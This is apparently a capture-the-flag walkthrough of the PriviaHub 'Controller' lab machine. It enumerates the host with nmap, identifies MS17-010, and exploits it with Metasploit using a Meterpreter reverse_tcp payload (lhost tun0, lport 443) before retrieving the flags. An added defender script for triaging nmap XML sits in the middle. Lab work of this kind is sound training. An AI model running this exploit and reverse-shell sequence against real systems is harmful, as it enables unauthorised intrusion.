PriviaHub Walkthrough : Controller
Today we will be looking at Controller from PriviaHub. This machine is easy, but it can be a good start for people who want to be penetration testers.
Summary:
- The system is vulnerable to EternalBlue (MS17-010).
- Two important ports are open on the machine: 139 and 445.
- Port 88/tcp (Kerberos) is open.
- Port 389/tcp (Active Directory LDAP) is open, among others.
- SMB is served on port 139 (NetBIOS) and port 445.
- CVE-2017-0143, risk factor: High.
- EternalBlue is both the name given to a series of Microsoft software vulnerabilities and the exploit created by the NSA as a cyberattack tool. Although the EternalBlue exploit (officially named MS17-010 by Microsoft) affects only Windows operating systems, anything that uses the SMBv1 (Server Message Block version 1) file-sharing protocol is technically at risk of being targeted for ransomware and other cyberattacks.
- Basic Windows privilege escalation using the shell command.
Let’s start with this machine.
The “controller” machine's IP is 172.16.71.214.
We are going to apply the usual penetration testing methodology, as we have before. Let's start with enumeration and learn as much about the machine as possible.
Enumeration
We are going to start with an nmap scan to gather more information about the services and versions running on this machine.
nmap -T4 -A -p- 172.16.71.214
The output shows all of the information about this machine.
Next, let's run an nmap vuln script scan.
nmap --script vuln 172.16.71.214 -vv
As we can see, the host is vulnerable to remote code execution (MS17-010).
IDs: CVE-2017-0143
Risk factor: High
We have to research this MS17-010 vulnerability.
We can look up the CVE details for CVE-2017-0143.
Result:
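As an added example (not part of the original walkthrough), here is a small Python script a defender can run over the XML output of the same scan (nmap --script vuln <target> -oX scan.xml) to list every host that exposes SMB or the domain services seen above and to flag any host whose smb-vuln-ms17-010 result says VULNERABLE. The XML embedded in the script is constructed to mimic nmap's layout for the Controller host, plus a second constructed host (172.16.71.250) that has 445 open but no script result. That second case is the caveat worth remembering: no script result means the check did not run or was inconclusive, not that the host is patched. The remediation is the MS17-010 update and disabling SMBv1.

```python
"""Triage nmap XML (-oX) for SMB exposure and MS17-010 results.

Added defender-side example; the embedded XML is constructed, not real scan
output, and the second host (172.16.71.250) is a made-up address.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Ports called out in the walkthrough and what they usually mean on a DC.
PORTS_OF_INTEREST = {88: "Kerberos", 139: "NetBIOS session (SMB)",
                     389: "LDAP", 445: "SMB"}
SMB_PORTS = {139, 445}


@dataclass
class HostFinding:
    address: str
    open_ports: list = field(default_factory=list)
    ms17_010_state: str = "NOT TESTED"   # nmap reports VULNERABLE / NOT VULNERABLE
    cve_ids: list = field(default_factory=list)

    @property
    def smb_exposed(self) -> bool:
        return any(p in SMB_PORTS for p in self.open_ports)

    @property
    def vulnerable(self) -> bool:
        return self.ms17_010_state == "VULNERABLE"


def parse_nmap_xml(xml_text: str) -> list:
    """Return one HostFinding per host that has an IPv4 address."""
    findings = []
    for host in ET.fromstring(xml_text).findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        f = HostFinding(address=addr.get("addr"))
        # Only open TCP ports count; closed/filtered ones are not exposure.
        for port in host.findall("ports/port"):
            state = port.find("state")
            if (port.get("protocol") == "tcp" and state is not None
                    and state.get("state") == "open"):
                f.open_ports.append(int(port.get("portid")))
        # smb-vuln-ms17-010 is a host script, so it lives under <hostscript>.
        script = host.find("hostscript/script[@id='smb-vuln-ms17-010']")
        if script is not None:
            state_el = script.find(".//elem[@key='state']")
            if state_el is not None and state_el.text:
                f.ms17_010_state = state_el.text.strip()
            for el in script.findall(".//table[@key='ids']/elem"):
                f.cve_ids.append(el.text.strip().replace("CVE:", ""))
        findings.append(f)
    return findings


def report(findings: list) -> list:
    """One line per host with the action a defender should take."""
    lines = []
    for f in findings:
        ports = ", ".join(f"{p}/tcp ({PORTS_OF_INTEREST[p]})"
                          for p in sorted(f.open_ports) if p in PORTS_OF_INTEREST)
        if f.vulnerable:
            action = "PATCH NOW (MS17-010) and disable SMBv1"
        elif f.smb_exposed and f.ms17_010_state == "NOT TESTED":
            action = "check manually (no script result is not proof of patching)"
        else:
            action = "ok"
        lines.append(f"{f.address}: ms17-010={f.ms17_010_state}; "
                     f"open: {ports or 'none of interest'}; action: {action}")
    return lines


# Constructed sample mimicking nmap's XML layout (not a real scan file).
SAMPLE_XML = """<nmaprun scanner="nmap">
<host><address addr="172.16.71.214" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="88"><state state="open"/><service name="kerberos-sec"/></port>
<port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
<port protocol="tcp" portid="389"><state state="open"/><service name="ldap"/></port>
<port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
<port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
</ports>
<hostscript><script id="smb-vuln-ms17-010" output="VULNERABLE: ... (ms17-010)">
<table key="CVE-2017-0143"><elem key="state">VULNERABLE</elem>
<table key="ids"><elem>CVE:CVE-2017-0143</elem></table>
<elem key="risk_factor">HIGH</elem></table></script></hostscript>
</host>
<host><address addr="172.16.71.250" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port></ports>
</host>
</nmaprun>"""

if __name__ == "__main__":
    for line in report(parse_nmap_xml(SAMPLE_XML)):
        print(line)
```

Run it as-is to see the two report lines; to use it on a real scan, replace SAMPLE_XML with the contents of the -oX file. Only open TCP ports are counted, so the closed 3389 in the sample never shows up as exposure.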
Exploitation
For this, we get help from the search function in Metasploit.
msfconsole
search eternalromance
The search above shows which module to use, and we select it.
use 1
set rhosts target ip
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 443
run
We are inside the machine.
Privilege Escalation
Then we can run sysinfo to learn about this machine's system information.
We can use the shell command to get a Windows command prompt.
You can find where each flag is by using the Windows dir command with a wildcard and the /s switch, which searches subdirectories recursively.
dir *file*txt /s
You can view the contents of each flag by using the Windows type command.
type file.txt
We enumerate to grab the root.txt and user.txt flags.
We found the user flag.
We found the root flag.
And our last step here is getting the root flag.
Hope you guys enjoyed this tutorial, let me know if you try this out. Follow me for more projects like this!